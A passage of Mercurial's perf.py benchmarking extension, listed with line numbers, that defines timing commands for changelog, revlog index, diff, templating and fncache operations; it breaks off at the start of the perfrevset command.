890 890 repo.changelog.read(n)
891 891 #repo.changelog._cache = None
892 892 timer(d)
893 893 fm.end()
894 894
895 895 @command(b'perfindex', formatteropts)
896 896 def perfindex(ui, repo, **opts):
897 897 import mercurial.revlog
898 898 timer, fm = gettimer(ui, opts)
899 899 mercurial.revlog._prereadsize = 2**24 # disable lazy parser in old hg
900 900 n = repo[b"tip"].node()
901 901 svfs = getsvfs(repo)
902 902 def d():
903 903 cl = mercurial.revlog.revlog(svfs, b"00changelog.i")
904 904 cl.rev(n)
905 905 timer(d)
906 906 fm.end()
907 907
908 908 @command(b'perfstartup', formatteropts)
909 909 def perfstartup(ui, repo, **opts):
910 910 timer, fm = gettimer(ui, opts)
911 911 cmd = sys.argv[0]
912 912 def d():
913 913 if os.name != b'nt':
914 914 os.system(b"HGRCPATH= %s version -q > /dev/null" % cmd)
915 915 else:
916 916 os.environ[b'HGRCPATH'] = b' '
917 917 os.system(b"%s version -q > NUL" % cmd)
918 918 timer(d)
919 919 fm.end()
920 920
921 921 @command(b'perfparents', formatteropts)
922 922 def perfparents(ui, repo, **opts):
923 923 timer, fm = gettimer(ui, opts)
924 924 # control the number of commits perfparents iterates over
925 925 # experimental config: perf.parentscount
926 926 count = getint(ui, b"perf", b"parentscount", 1000)
927 927 if len(repo.changelog) < count:
928 928 raise error.Abort(b"repo needs %d commits for this test" % count)
929 929 repo = repo.unfiltered()
930 930 nl = [repo.changelog.node(i) for i in xrange(count)]
931 931 def d():
932 932 for n in nl:
933 933 repo.changelog.parents(n)
934 934 timer(d)
935 935 fm.end()
936 936
937 937 @command(b'perfctxfiles', formatteropts)
938 938 def perfctxfiles(ui, repo, x, **opts):
939 939 x = int(x)
940 940 timer, fm = gettimer(ui, opts)
941 941 def d():
942 942 len(repo[x].files())
943 943 timer(d)
944 944 fm.end()
945 945
946 946 @command(b'perfrawfiles', formatteropts)
947 947 def perfrawfiles(ui, repo, x, **opts):
948 948 x = int(x)
949 949 timer, fm = gettimer(ui, opts)
950 950 cl = repo.changelog
951 951 def d():
952 952 len(cl.read(x)[3])
953 953 timer(d)
954 954 fm.end()
955 955
956 956 @command(b'perflookup', formatteropts)
957 957 def perflookup(ui, repo, rev, **opts):
958 958 timer, fm = gettimer(ui, opts)
959 959 timer(lambda: len(repo.lookup(rev)))
960 960 fm.end()
961 961
962 962 @command(b'perflinelogedits',
963 963 [(b'n', b'edits', 10000, b'number of edits'),
964 964 (b'', b'max-hunk-lines', 10, b'max lines in a hunk'),
965 965 ], norepo=True)
966 966 def perflinelogedits(ui, **opts):
967 967 from mercurial import linelog
968 968
969 969 edits = opts[b'edits']
970 970 maxhunklines = opts[b'max_hunk_lines']
971 971
972 972 maxb1 = 100000
973 973 random.seed(0)
974 974 randint = random.randint
975 975 currentlines = 0
976 976 arglist = []
977 977 for rev in xrange(edits):
978 978 a1 = randint(0, currentlines)
979 979 a2 = randint(a1, min(currentlines, a1 + maxhunklines))
980 980 b1 = randint(0, maxb1)
981 981 b2 = randint(b1, b1 + maxhunklines)
982 982 currentlines += (b2 - b1) - (a2 - a1)
983 983 arglist.append((rev, a1, a2, b1, b2))
984 984
985 985 def d():
986 986 ll = linelog.linelog()
987 987 for args in arglist:
988 988 ll.replacelines(*args)
989 989
990 990 timer, fm = gettimer(ui, opts)
991 991 timer(d)
992 992 fm.end()
993 993
994 994 @command(b'perfrevrange', formatteropts)
995 995 def perfrevrange(ui, repo, *specs, **opts):
996 996 timer, fm = gettimer(ui, opts)
997 997 revrange = scmutil.revrange
998 998 timer(lambda: len(revrange(repo, specs)))
999 999 fm.end()
1000 1000
1001 1001 @command(b'perfnodelookup', formatteropts)
1002 1002 def perfnodelookup(ui, repo, rev, **opts):
1003 1003 timer, fm = gettimer(ui, opts)
1004 1004 import mercurial.revlog
1005 1005 mercurial.revlog._prereadsize = 2**24 # disable lazy parser in old hg
1006 1006 n = scmutil.revsingle(repo, rev).node()
1007 1007 cl = mercurial.revlog.revlog(getsvfs(repo), b"00changelog.i")
1008 1008 def d():
1009 1009 cl.rev(n)
1010 1010 clearcaches(cl)
1011 1011 timer(d)
1012 1012 fm.end()
1013 1013
1014 1014 @command(b'perflog',
1015 1015 [(b'', b'rename', False, b'ask log to follow renames')
1016 1016 ] + formatteropts)
1017 1017 def perflog(ui, repo, rev=None, **opts):
1018 1018 if rev is None:
1019 1019 rev=[]
1020 1020 timer, fm = gettimer(ui, opts)
1021 1021 ui.pushbuffer()
1022 1022 timer(lambda: commands.log(ui, repo, rev=rev, date=b'', user=b'',
1023 1023 copies=opts.get(b'rename')))
1024 1024 ui.popbuffer()
1025 1025 fm.end()
1026 1026
1027 1027 @command(b'perfmoonwalk', formatteropts)
1028 1028 def perfmoonwalk(ui, repo, **opts):
1029 1029 """benchmark walking the changelog backwards
1030 1030
1031 1031 This also loads the changelog data for each revision in the changelog.
1032 1032 """
1033 1033 timer, fm = gettimer(ui, opts)
1034 1034 def moonwalk():
1035 1035 for i in repo.changelog.revs(start=(len(repo) - 1), stop=-1):
1036 1036 ctx = repo[i]
1037 1037 ctx.branch() # read changelog data (in addition to the index)
1038 1038 timer(moonwalk)
1039 1039 fm.end()
1040 1040
1041 1041 @command(b'perftemplating',
1042 1042 [(b'r', b'rev', [], b'revisions to run the template on'),
1043 1043 ] + formatteropts)
1044 1044 def perftemplating(ui, repo, testedtemplate=None, **opts):
1045 1045 """test the rendering time of a given template"""
1046 1046 if makelogtemplater is None:
1047 1047 raise error.Abort((b"perftemplating not available with this Mercurial"),
1048 1048 hint=b"use 4.3 or later")
1049 1049
1050 1050 nullui = ui.copy()
1051 1051 nullui.fout = open(os.devnull, b'wb')
1052 1052 nullui.disablepager()
1053 1053 revs = opts.get(b'rev')
1054 1054 if not revs:
1055 1055 revs = [b'all()']
1056 1056 revs = list(scmutil.revrange(repo, revs))
1057 1057
1058 1058 defaulttemplate = (b'{date|shortdate} [{rev}:{node|short}]'
1059 1059 b' {author|person}: {desc|firstline}\n')
1060 1060 if testedtemplate is None:
1061 1061 testedtemplate = defaulttemplate
1062 1062 displayer = makelogtemplater(nullui, repo, testedtemplate)
1063 1063 def format():
1064 1064 for r in revs:
1065 1065 ctx = repo[r]
1066 1066 displayer.show(ctx)
1067 1067 displayer.flush(ctx)
1068 1068
1069 1069 timer, fm = gettimer(ui, opts)
1070 1070 timer(format)
1071 1071 fm.end()
1072 1072
1073 1073 @command(b'perfcca', formatteropts)
1074 1074 def perfcca(ui, repo, **opts):
1075 1075 timer, fm = gettimer(ui, opts)
1076 1076 timer(lambda: scmutil.casecollisionauditor(ui, False, repo.dirstate))
1077 1077 fm.end()
1078 1078
1079 1079 @command(b'perffncacheload', formatteropts)
1080 1080 def perffncacheload(ui, repo, **opts):
1081 1081 timer, fm = gettimer(ui, opts)
1082 1082 s = repo.store
1083 1083 def d():
1084 1084 s.fncache._load()
1085 1085 timer(d)
1086 1086 fm.end()
1087 1087
1088 1088 @command(b'perffncachewrite', formatteropts)
1089 1089 def perffncachewrite(ui, repo, **opts):
1090 1090 timer, fm = gettimer(ui, opts)
1091 1091 s = repo.store
1092 1092 lock = repo.lock()
1093 1093 s.fncache._load()
1094 1094 tr = repo.transaction(b'perffncachewrite')
1095 1095 tr.addbackup(b'fncache')
1096 1096 def d():
1097 1097 s.fncache._dirty = True
1098 1098 s.fncache.write(tr)
1099 1099 timer(d)
1100 1100 tr.close()
1101 1101 lock.release()
1102 1102 fm.end()
1103 1103
1104 1104 @command(b'perffncacheencode', formatteropts)
1105 1105 def perffncacheencode(ui, repo, **opts):
1106 1106 timer, fm = gettimer(ui, opts)
1107 1107 s = repo.store
1108 1108 s.fncache._load()
1109 1109 def d():
1110 1110 for p in s.fncache.entries:
1111 1111 s.encode(p)
1112 1112 timer(d)
1113 1113 fm.end()
1114 1114
1115 1115 def _bdiffworker(q, blocks, xdiff, ready, done):
1116 1116 while not done.is_set():
1117 1117 pair = q.get()
1118 1118 while pair is not None:
1119 1119 if xdiff:
1120 1120 mdiff.bdiff.xdiffblocks(*pair)
1121 1121 elif blocks:
1122 1122 mdiff.bdiff.blocks(*pair)
1123 1123 else:
1124 1124 mdiff.textdiff(*pair)
1125 1125 q.task_done()
1126 1126 pair = q.get()
1127 1127 q.task_done() # for the None one
1128 1128 with ready:
1129 1129 ready.wait()
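# The worker above drains (text1, text2) pairs from the queue until it sees a
# None sentinel, then blocks on the `ready` condition so the same threads can
# be reused across timing runs (see the threaded path of perfbdiff below).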
1130 1130
1131 1131 def _manifestrevision(repo, mnode):
1132 1132 ml = repo.manifestlog
1133 1133
1134 1134 if util.safehasattr(ml, b'getstorage'):
1135 1135 store = ml.getstorage(b'')
1136 1136 else:
1137 1137 store = ml._revlog
1138 1138
1139 1139 return store.revision(mnode)
1140 1140
1141 1141 @command(b'perfbdiff', revlogopts + formatteropts + [
1142 1142 (b'', b'count', 1, b'number of revisions to test (when using --startrev)'),
1143 1143 (b'', b'alldata', False, b'test bdiffs for all associated revisions'),
1144 1144 (b'', b'threads', 0, b'number of thread to use (disable with 0)'),
1145 1145 (b'', b'blocks', False, b'test computing diffs into blocks'),
1146 1146 (b'', b'xdiff', False, b'use xdiff algorithm'),
1147 1147 ],
1148 1148
1149 1149 b'-c|-m|FILE REV')
1150 1150 def perfbdiff(ui, repo, file_, rev=None, count=None, threads=0, **opts):
1151 1151 """benchmark a bdiff between revisions
1152 1152
1153 1153 By default, benchmark a bdiff between the requested revision and its delta parent.
1154 1154
1155 1155 With ``--count``, benchmark bdiffs between delta parents and self for N
1156 1156 revisions starting at the specified revision.
1157 1157
1158 1158 With ``--alldata``, assume the requested revision is a changeset and
1159 1159 measure bdiffs for all changes related to that changeset (manifest
1160 1160 and filelogs).
1161 1161 """
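# Illustrative invocations (a sketch):
#   hg perfbdiff -c 100          # changelog rev 100 against its delta parent
#   hg perfbdiff --alldata 100   # all manifest/filelog pairs for changeset 100
#   hg perfbdiff FILE 5          # revision 5 of FILE's filelog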
1162 1162 opts = pycompat.byteskwargs(opts)
1163 1163
1164 1164 if opts[b'xdiff'] and not opts[b'blocks']:
1165 1165 raise error.CommandError(b'perfbdiff', b'--xdiff requires --blocks')
1166 1166
1167 1167 if opts[b'alldata']:
1168 1168 opts[b'changelog'] = True
1169 1169
1170 1170 if opts.get(b'changelog') or opts.get(b'manifest'):
1171 1171 file_, rev = None, file_
1172 1172 elif rev is None:
1173 1173 raise error.CommandError(b'perfbdiff', b'invalid arguments')
1174 1174
1175 1175 blocks = opts[b'blocks']
1176 1176 xdiff = opts[b'xdiff']
1177 1177 textpairs = []
1178 1178
1179 1179 r = cmdutil.openrevlog(repo, b'perfbdiff', file_, opts)
1180 1180
1181 1181 startrev = r.rev(r.lookup(rev))
1182 1182 for rev in range(startrev, min(startrev + count, len(r) - 1)):
1183 1183 if opts[b'alldata']:
1184 1184 # Load revisions associated with changeset.
1185 1185 ctx = repo[rev]
1186 1186 mtext = _manifestrevision(repo, ctx.manifestnode())
1187 1187 for pctx in ctx.parents():
1188 1188 pman = _manifestrevision(repo, pctx.manifestnode())
1189 1189 textpairs.append((pman, mtext))
1190 1190
1191 1191 # Load filelog revisions by iterating manifest delta.
1192 1192 man = ctx.manifest()
1193 1193 pman = ctx.p1().manifest()
1194 1194 for filename, change in pman.diff(man).items():
1195 1195 fctx = repo.file(filename)
1196 1196 f1 = fctx.revision(change[0][0] or -1)
1197 1197 f2 = fctx.revision(change[1][0] or -1)
1198 1198 textpairs.append((f1, f2))
1199 1199 else:
1200 1200 dp = r.deltaparent(rev)
1201 1201 textpairs.append((r.revision(dp), r.revision(rev)))
1202 1202
1203 1203 withthreads = threads > 0
1204 1204 if not withthreads:
1205 1205 def d():
1206 1206 for pair in textpairs:
1207 1207 if xdiff:
1208 1208 mdiff.bdiff.xdiffblocks(*pair)
1209 1209 elif blocks:
1210 1210 mdiff.bdiff.blocks(*pair)
1211 1211 else:
1212 1212 mdiff.textdiff(*pair)
1213 1213 else:
1214 1214 q = queue()
1215 1215 for i in xrange(threads):
1216 1216 q.put(None)
1217 1217 ready = threading.Condition()
1218 1218 done = threading.Event()
1219 1219 for i in xrange(threads):
1220 1220 threading.Thread(target=_bdiffworker,
1221 1221 args=(q, blocks, xdiff, ready, done)).start()
1222 1222 q.join()
1223 1223 def d():
1224 1224 for pair in textpairs:
1225 1225 q.put(pair)
1226 1226 for i in xrange(threads):
1227 1227 q.put(None)
1228 1228 with ready:
1229 1229 ready.notify_all()
1230 1230 q.join()
1231 1231 timer, fm = gettimer(ui, opts)
1232 1232 timer(d)
1233 1233 fm.end()
1234 1234
1235 1235 if withthreads:
1236 1236 done.set()
1237 1237 for i in xrange(threads):
1238 1238 q.put(None)
1239 1239 with ready:
1240 1240 ready.notify_all()
1241 1241
1242 1242 @command(b'perfunidiff', revlogopts + formatteropts + [
1243 1243 (b'', b'count', 1, b'number of revisions to test (when using --startrev)'),
1244 1244 (b'', b'alldata', False, b'test unidiffs for all associated revisions'),
1245 1245 ], b'-c|-m|FILE REV')
1246 1246 def perfunidiff(ui, repo, file_, rev=None, count=None, **opts):
1247 1247 """benchmark a unified diff between revisions
1248 1248
1249 1249 This doesn't include any copy tracing - it's just a unified diff
1250 1250 of the texts.
1251 1251
1252 1252 By default, benchmark a diff between the requested revision and its delta parent.
1253 1253
1254 1254 With ``--count``, benchmark diffs between delta parents and self for N
1255 1255 revisions starting at the specified revision.
1256 1256
1257 1257 With ``--alldata``, assume the requested revision is a changeset and
1258 1258 measure diffs for all changes related to that changeset (manifest
1259 1259 and filelogs).
1260 1260 """
1261 1261 if opts[b'alldata']:
1262 1262 opts[b'changelog'] = True
1263 1263
1264 1264 if opts.get(b'changelog') or opts.get(b'manifest'):
1265 1265 file_, rev = None, file_
1266 1266 elif rev is None:
1267 1267 raise error.CommandError(b'perfunidiff', b'invalid arguments')
1268 1268
1269 1269 textpairs = []
1270 1270
1271 1271 r = cmdutil.openrevlog(repo, b'perfunidiff', file_, opts)
1272 1272
1273 1273 startrev = r.rev(r.lookup(rev))
1274 1274 for rev in range(startrev, min(startrev + count, len(r) - 1)):
1275 1275 if opts[b'alldata']:
1276 1276 # Load revisions associated with changeset.
1277 1277 ctx = repo[rev]
1278 1278 mtext = _manifestrevision(repo, ctx.manifestnode())
1279 1279 for pctx in ctx.parents():
1280 1280 pman = _manifestrevision(repo, pctx.manifestnode())
1281 1281 textpairs.append((pman, mtext))
1282 1282
1283 1283 # Load filelog revisions by iterating manifest delta.
1284 1284 man = ctx.manifest()
1285 1285 pman = ctx.p1().manifest()
1286 1286 for filename, change in pman.diff(man).items():
1287 1287 fctx = repo.file(filename)
1288 1288 f1 = fctx.revision(change[0][0] or -1)
1289 1289 f2 = fctx.revision(change[1][0] or -1)
1290 1290 textpairs.append((f1, f2))
1291 1291 else:
1292 1292 dp = r.deltaparent(rev)
1293 1293 textpairs.append((r.revision(dp), r.revision(rev)))
1294 1294
1295 1295 def d():
1296 1296 for left, right in textpairs:
1297 1297 # The date strings don't matter, so we pass empty strings.
1298 1298 headerlines, hunks = mdiff.unidiff(
1299 1299 left, b'', right, b'', b'left', b'right', binary=False)
1300 1300 # consume iterators in roughly the way patch.py does
1301 1301 b'\n'.join(headerlines)
1302 1302 b''.join(sum((list(hlines) for hrange, hlines in hunks), []))
1303 1303 timer, fm = gettimer(ui, opts)
1304 1304 timer(d)
1305 1305 fm.end()
1306 1306
1307 1307 @command(b'perfdiffwd', formatteropts)
1308 1308 def perfdiffwd(ui, repo, **opts):
1309 1309 """Profile diff of working directory changes"""
1310 1310 timer, fm = gettimer(ui, opts)
1311 1311 options = {
1312 1312 b'w': b'ignore_all_space',
1313 1313 b'b': b'ignore_space_change',
1314 1314 b'B': b'ignore_blank_lines',
1315 1315 }
1316 1316
1317 1317 for diffopt in (b'', b'w', b'b', b'B', b'wB'):
1318 1318 opts = dict((options[c], b'1') for c in diffopt)
1319 1319 def d():
1320 1320 ui.pushbuffer()
1321 1321 commands.diff(ui, repo, **opts)
1322 1322 ui.popbuffer()
1323 1323 title = b'diffopts: %s' % (diffopt and (b'-' + diffopt) or b'none')
1324 1324 timer(d, title)
1325 1325 fm.end()
1326 1326
1327 1327 @command(b'perfrevlogindex', revlogopts + formatteropts,
1328 1328 b'-c|-m|FILE')
1329 1329 def perfrevlogindex(ui, repo, file_=None, **opts):
1330 1330 """Benchmark operations against a revlog index.
1331 1331
1332 1332 This tests constructing a revlog instance, reading index data,
1333 1333 parsing index data, and performing various operations related to
1334 1334 index data.
1335 1335 """
1336 1336
1337 1337 rl = cmdutil.openrevlog(repo, b'perfrevlogindex', file_, opts)
1338 1338
1339 1339 opener = getattr(rl, 'opener') # trick linter
1340 1340 indexfile = rl.indexfile
1341 1341 data = opener.read(indexfile)
1342 1342
1343 1343 header = struct.unpack(b'>I', data[0:4])[0]
1344 1344 version = header & 0xFFFF
1345 1345 if version == 1:
1346 1346 revlogio = revlog.revlogio()
1347 1347 inline = header & (1 << 16)
1348 1348 else:
1349 1349 raise error.Abort((b'unsupported revlog version: %d') % version)
1350 1350
1351 1351 rllen = len(rl)
1352 1352
1353 1353 node0 = rl.node(0)
1354 1354 node25 = rl.node(rllen // 4)
1355 1355 node50 = rl.node(rllen // 2)
1356 1356 node75 = rl.node(rllen // 4 * 3)
1357 1357 node100 = rl.node(rllen - 1)
1358 1358
1359 1359 allrevs = range(rllen)
1360 1360 allrevsrev = list(reversed(allrevs))
1361 1361 allnodes = [rl.node(rev) for rev in range(rllen)]
1362 1362 allnodesrev = list(reversed(allnodes))
1363 1363
1364 1364 def constructor():
1365 1365 revlog.revlog(opener, indexfile)
1366 1366
1367 1367 def read():
1368 1368 with opener(indexfile) as fh:
1369 1369 fh.read()
1370 1370
1371 1371 def parseindex():
1372 1372 revlogio.parseindex(data, inline)
1373 1373
1374 1374 def getentry(revornode):
1375 1375 index = revlogio.parseindex(data, inline)[0]
1376 1376 index[revornode]
1377 1377
1378 1378 def getentries(revs, count=1):
1379 1379 index = revlogio.parseindex(data, inline)[0]
1380 1380
1381 1381 for i in range(count):
1382 1382 for rev in revs:
1383 1383 index[rev]
1384 1384
1385 1385 def resolvenode(node):
1386 1386 nodemap = revlogio.parseindex(data, inline)[1]
1387 1387 # This only works for the C code.
1388 1388 if nodemap is None:
1389 1389 return
1390 1390
1391 1391 try:
1392 1392 nodemap[node]
1393 1393 except error.RevlogError:
1394 1394 pass
1395 1395
1396 1396 def resolvenodes(nodes, count=1):
1397 1397 nodemap = revlogio.parseindex(data, inline)[1]
1398 1398 if nodemap is None:
1399 1399 return
1400 1400
1401 1401 for i in range(count):
1402 1402 for node in nodes:
1403 1403 try:
1404 1404 nodemap[node]
1405 1405 except error.RevlogError:
1406 1406 pass
1407 1407
1408 1408 benches = [
1409 1409 (constructor, b'revlog constructor'),
1410 1410 (read, b'read'),
1411 1411 (parseindex, b'create index object'),
1412 1412 (lambda: getentry(0), b'retrieve index entry for rev 0'),
1413 1413 (lambda: resolvenode(b'a' * 20), b'look up missing node'),
1414 1414 (lambda: resolvenode(node0), b'look up node at rev 0'),
1415 1415 (lambda: resolvenode(node25), b'look up node at 1/4 len'),
1416 1416 (lambda: resolvenode(node50), b'look up node at 1/2 len'),
1417 1417 (lambda: resolvenode(node75), b'look up node at 3/4 len'),
1418 1418 (lambda: resolvenode(node100), b'look up node at tip'),
1419 1419 # 2x variation is to measure caching impact.
1420 1420 (lambda: resolvenodes(allnodes),
1421 1421 b'look up all nodes (forward)'),
1422 1422 (lambda: resolvenodes(allnodes, 2),
1423 1423 b'look up all nodes 2x (forward)'),
1424 1424 (lambda: resolvenodes(allnodesrev),
1425 1425 b'look up all nodes (reverse)'),
1426 1426 (lambda: resolvenodes(allnodesrev, 2),
1427 1427 b'look up all nodes 2x (reverse)'),
1428 1428 (lambda: getentries(allrevs),
1429 1429 b'retrieve all index entries (forward)'),
1430 1430 (lambda: getentries(allrevs, 2),
1431 1431 b'retrieve all index entries 2x (forward)'),
1432 1432 (lambda: getentries(allrevsrev),
1433 1433 b'retrieve all index entries (reverse)'),
1434 1434 (lambda: getentries(allrevsrev, 2),
1435 1435 b'retrieve all index entries 2x (reverse)'),
1436 1436 ]
1437 1437
1438 1438 for fn, title in benches:
1439 1439 timer, fm = gettimer(ui, opts)
1440 1440 timer(fn, title=title)
1441 1441 fm.end()
1442 1442
1443 1443 @command(b'perfrevlogrevisions', revlogopts + formatteropts +
1444 1444 [(b'd', b'dist', 100, b'distance between the revisions'),
1445 1445 (b's', b'startrev', 0, b'revision to start reading at'),
1446 1446 (b'', b'reverse', False, b'read in reverse')],
1447 1447 b'-c|-m|FILE')
1448 1448 def perfrevlogrevisions(ui, repo, file_=None, startrev=0, reverse=False,
1449 1449 **opts):
1450 1450 """Benchmark reading a series of revisions from a revlog.
1451 1451
1452 1452 By default, we read every ``-d/--dist`` revision from 0 to tip of
1453 1453 the specified revlog.
1454 1454
1455 1455 The start revision can be defined via ``-s/--startrev``.
1456 1456 """
1457 1457 rl = cmdutil.openrevlog(repo, b'perfrevlogrevisions', file_, opts)
1458 1458 rllen = getlen(ui)(rl)
1459 1459
1460 1460 def d():
1461 1461 rl.clearcaches()
1462 1462
1463 1463 beginrev = startrev
1464 1464 endrev = rllen
1465 1465 dist = opts[b'dist']
1466 1466
1467 1467 if reverse:
1468 1468 beginrev, endrev = endrev, beginrev
1469 1469 dist = -1 * dist
1470 1470
1471 1471 for x in xrange(beginrev, endrev, dist):
1472 1472 # Old revisions don't support passing int.
1473 1473 n = rl.node(x)
1474 1474 rl.revision(n)
1475 1475
1476 1476 timer, fm = gettimer(ui, opts)
1477 1477 timer(d)
1478 1478 fm.end()
1479 1479
1480 1480 @command(b'perfrevlogchunks', revlogopts + formatteropts +
1481 1481 [(b'e', b'engines', b'', b'compression engines to use'),
1482 1482 (b's', b'startrev', 0, b'revision to start at')],
1483 1483 b'-c|-m|FILE')
1484 1484 def perfrevlogchunks(ui, repo, file_=None, engines=None, startrev=0, **opts):
1485 1485 """Benchmark operations on revlog chunks.
1486 1486
1487 1487 Logically, each revlog is a collection of fulltext revisions. However,
1488 1488 stored within each revlog are "chunks" of possibly compressed data. This
1489 1489 data needs to be read and decompressed or compressed and written.
1490 1490
1491 1491 This command measures the time it takes to read+decompress and recompress
1492 1492 chunks in a revlog. It effectively isolates I/O and compression performance.
1493 1493 For measurements of higher-level operations like resolving revisions,
1494 1494 see ``perfrevlogrevisions`` and ``perfrevlogrevision``.
1495 1495 """
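# In other words (a sketch of what is timed below): the read* benchmarks time
# seek+read of the raw, possibly compressed segments, the chunk benchmarks add
# decompression, and the compress benchmarks recompress those chunks; delta
# application and hashing are deliberately out of scope (see perfrevlogrevision).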
1496 1496 rl = cmdutil.openrevlog(repo, b'perfrevlogchunks', file_, opts)
1497 1497
1498 1498 # _chunkraw was renamed to _getsegmentforrevs.
1499 1499 try:
1500 1500 segmentforrevs = rl._getsegmentforrevs
1501 1501 except AttributeError:
1502 1502 segmentforrevs = rl._chunkraw
1503 1503
1504 1504 # Verify engines argument.
1505 1505 if engines:
1506 1506 engines = set(e.strip() for e in engines.split(b','))
1507 1507 for engine in engines:
1508 1508 try:
1509 1509 util.compressionengines[engine]
1510 1510 except KeyError:
1511 1511 raise error.Abort(b'unknown compression engine: %s' % engine)
1512 1512 else:
1513 1513 engines = []
1514 1514 for e in util.compengines:
1515 1515 engine = util.compengines[e]
1516 1516 try:
1517 1517 if engine.available():
1518 1518 engine.revlogcompressor().compress(b'dummy')
1519 1519 engines.append(e)
1520 1520 except NotImplementedError:
1521 1521 pass
1522 1522
1523 1523 revs = list(rl.revs(startrev, len(rl) - 1))
1524 1524
1525 1525 def rlfh(rl):
1526 1526 if rl._inline:
1527 1527 return getsvfs(repo)(rl.indexfile)
1528 1528 else:
1529 1529 return getsvfs(repo)(rl.datafile)
1530 1530
1531 1531 def doread():
1532 1532 rl.clearcaches()
1533 1533 for rev in revs:
1534 1534 segmentforrevs(rev, rev)
1535 1535
1536 1536 def doreadcachedfh():
1537 1537 rl.clearcaches()
1538 1538 fh = rlfh(rl)
1539 1539 for rev in revs:
1540 1540 segmentforrevs(rev, rev, df=fh)
1541 1541
1542 1542 def doreadbatch():
1543 1543 rl.clearcaches()
1544 1544 segmentforrevs(revs[0], revs[-1])
1545 1545
1546 1546 def doreadbatchcachedfh():
1547 1547 rl.clearcaches()
1548 1548 fh = rlfh(rl)
1549 1549 segmentforrevs(revs[0], revs[-1], df=fh)
1550 1550
1551 1551 def dochunk():
1552 1552 rl.clearcaches()
1553 1553 fh = rlfh(rl)
1554 1554 for rev in revs:
1555 1555 rl._chunk(rev, df=fh)
1556 1556
1557 1557 chunks = [None]
1558 1558
1559 1559 def dochunkbatch():
1560 1560 rl.clearcaches()
1561 1561 fh = rlfh(rl)
1562 1562 # Save chunks as a side-effect.
1563 1563 chunks[0] = rl._chunks(revs, df=fh)
1564 1564
1565 1565 def docompress(compressor):
1566 1566 rl.clearcaches()
1567 1567
1568 1568 try:
1569 1569 # Swap in the requested compression engine.
1570 1570 oldcompressor = rl._compressor
1571 1571 rl._compressor = compressor
1572 1572 for chunk in chunks[0]:
1573 1573 rl.compress(chunk)
1574 1574 finally:
1575 1575 rl._compressor = oldcompressor
1576 1576
1577 1577 benches = [
1578 1578 (lambda: doread(), b'read'),
1579 1579 (lambda: doreadcachedfh(), b'read w/ reused fd'),
1580 1580 (lambda: doreadbatch(), b'read batch'),
1581 1581 (lambda: doreadbatchcachedfh(), b'read batch w/ reused fd'),
1582 1582 (lambda: dochunk(), b'chunk'),
1583 1583 (lambda: dochunkbatch(), b'chunk batch'),
1584 1584 ]
1585 1585
1586 1586 for engine in sorted(engines):
1587 1587 compressor = util.compengines[engine].revlogcompressor()
1588 1588 benches.append((functools.partial(docompress, compressor),
1589 1589 b'compress w/ %s' % engine))
1590 1590
1591 1591 for fn, title in benches:
1592 1592 timer, fm = gettimer(ui, opts)
1593 1593 timer(fn, title=title)
1594 1594 fm.end()
1595 1595
1596 1596 @command(b'perfrevlogrevision', revlogopts + formatteropts +
1597 1597 [(b'', b'cache', False, b'use caches instead of clearing')],
1598 1598 b'-c|-m|FILE REV')
1599 1599 def perfrevlogrevision(ui, repo, file_, rev=None, cache=None, **opts):
1600 1600 """Benchmark obtaining a revlog revision.
1601 1601
1602 1602 Obtaining a revlog revision consists of roughly the following steps:
1603 1603
1604 1604 1. Compute the delta chain
1605 1605 2. Obtain the raw chunks for that delta chain
1606 1606 3. Decompress each raw chunk
1607 1607 4. Apply binary patches to obtain fulltext
1608 1608 5. Verify hash of fulltext
1609 1609
1610 1610 This command measures the time spent in each of these phases.
1611 1611 """
1612 1612 if opts.get(b'changelog') or opts.get(b'manifest'):
1613 1613 file_, rev = None, file_
1614 1614 elif rev is None:
1615 1615 raise error.CommandError(b'perfrevlogrevision', b'invalid arguments')
1616 1616
1617 1617 r = cmdutil.openrevlog(repo, b'perfrevlogrevision', file_, opts)
1618 1618
1619 1619 # _chunkraw was renamed to _getsegmentforrevs.
1620 1620 try:
1621 1621 segmentforrevs = r._getsegmentforrevs
1622 1622 except AttributeError:
1623 1623 segmentforrevs = r._chunkraw
1624 1624
1625 1625 node = r.lookup(rev)
1626 1626 rev = r.rev(node)
1627 1627
1628 1628 def getrawchunks(data, chain):
1629 1629 start = r.start
1630 1630 length = r.length
1631 1631 inline = r._inline
1632 1632 iosize = r._io.size
1633 1633 buffer = util.buffer
1634 1634 offset = start(chain[0])
1635 1635
1636 1636 chunks = []
1637 1637 ladd = chunks.append
1638 1638
1639 1639 for rev in chain:
1640 1640 chunkstart = start(rev)
1641 1641 if inline:
1642 1642 chunkstart += (rev + 1) * iosize
1643 1643 chunklength = length(rev)
1644 1644 ladd(buffer(data, chunkstart - offset, chunklength))
1645 1645
1646 1646 return chunks
1647 1647
1648 1648 def dodeltachain(rev):
1649 1649 if not cache:
1650 1650 r.clearcaches()
1651 1651 r._deltachain(rev)
1652 1652
1653 1653 def doread(chain):
1654 1654 if not cache:
1655 1655 r.clearcaches()
1656 1656 segmentforrevs(chain[0], chain[-1])
1657 1657
1658 1658 def dorawchunks(data, chain):
1659 1659 if not cache:
1660 1660 r.clearcaches()
1661 1661 getrawchunks(data, chain)
1662 1662
1663 1663 def dodecompress(chunks):
1664 1664 decomp = r.decompress
1665 1665 for chunk in chunks:
1666 1666 decomp(chunk)
1667 1667
1668 1668 def dopatch(text, bins):
1669 1669 if not cache:
1670 1670 r.clearcaches()
1671 1671 mdiff.patches(text, bins)
1672 1672
1673 1673 def dohash(text):
1674 1674 if not cache:
1675 1675 r.clearcaches()
1676 1676 r.checkhash(text, node, rev=rev)
1677 1677
1678 1678 def dorevision():
1679 1679 if not cache:
1680 1680 r.clearcaches()
1681 1681 r.revision(node)
1682 1682
1683 1683 chain = r._deltachain(rev)[0]
1684 1684 data = segmentforrevs(chain[0], chain[-1])[1]
1685 1685 rawchunks = getrawchunks(data, chain)
1686 1686 bins = r._chunks(chain)
1687 1687 text = str(bins[0])
1688 1688 bins = bins[1:]
1689 1689 text = mdiff.patches(text, bins)
1690 1690
1691 1691 benches = [
1692 1692 (lambda: dorevision(), b'full'),
1693 1693 (lambda: dodeltachain(rev), b'deltachain'),
1694 1694 (lambda: doread(chain), b'read'),
1695 1695 (lambda: dorawchunks(data, chain), b'rawchunks'),
1696 1696 (lambda: dodecompress(rawchunks), b'decompress'),
1697 1697 (lambda: dopatch(text, bins), b'patch'),
1698 1698 (lambda: dohash(text), b'hash'),
1699 1699 ]
1700 1700
1701 1701 for fn, title in benches:
1702 1702 timer, fm = gettimer(ui, opts)
1703 1703 timer(fn, title=title)
1704 1704 fm.end()
1705 1705
1706 1706 @command(b'perfrevset',
